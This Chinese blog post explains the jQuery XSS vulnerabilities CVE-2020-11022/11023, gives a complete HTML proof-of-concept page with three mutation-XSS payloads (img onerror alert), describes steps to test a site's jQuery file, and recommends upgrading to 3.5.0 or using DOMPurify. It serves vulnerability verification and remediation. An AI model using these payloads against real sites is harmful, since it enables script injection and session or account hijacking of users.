漏洞号:CVE-2020-11022/CVE-2020-11023
漏洞概况及影响
该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄露、账户被劫持、会话被劫持等安全问题。
一、漏洞版本
影响范围:jQuery >= 1.0.3 < 3.5.0
在大于或等于1.2且在3.5.0之前的jQuery版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。
二、漏洞验证
payload
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
<script src="jquery.min.js地址"></script>
</head>
<body>
<script>
function test(n,jq){
sanitizedHTML = document.getElementById('poc'+n).innerHTML;
if(jq){
$('#div').html(sanitizedHTML);
}else{
div.innerHTML=sanitizedHTML;
}
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>
<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(1)>
</xmp>
<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert(1)>">
</xmp>
<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert(1)></style>
</xmp>
<div id="div"></div>
</body>
</html>
上面漏洞验证payload代码没有问题,需要保存.html文件中,并用浏览器打开。
下图为示例
三、验证过程
1、找到存在漏洞的jquery.min.js文件,点击并进入
2、进入上面的js文件,将上方payload代码中的"jquery.min.js地址"替换为下图中的地址
3、替换后如下图,(在文件编辑器中修改或者记事本)
注:src链接可用https://www.example.com/cszq/js/jquery.min.js
4、将该html文件在浏览器中打开
点击Poc按钮即可,我这里演示Poc3,其他Poc都可以,只需要存在一个弹窗即存在XSS漏洞
四、修复
(1)更新jQuery到3.5.0或更高版本
https://code.jquery.com/jquery-3.5.0.js
(2)使用XSS清理工具清理用户输入的HTML
官方推荐:https://github.com/cure53/DOMPurify
实践是检验真理的唯一标准,请大家积极实践
请大家指出的我问题和需要完善的地方,咱们共同进步
清风.春不晚与诸君共勉,共创辉煌篇章
![[入门一]C# webApi创建、与发布、部署、api调用](https://i-blog.csdnimg.cn/blog_migrate/3faf00a0a9f60798fd1b09cc01f75f23.png)
![[游戏开发] Unity中使用FlatBuffer](https://i-blog.csdnimg.cn/direct/752dd5b1694b4417b4a22af8b1dd2052.png)
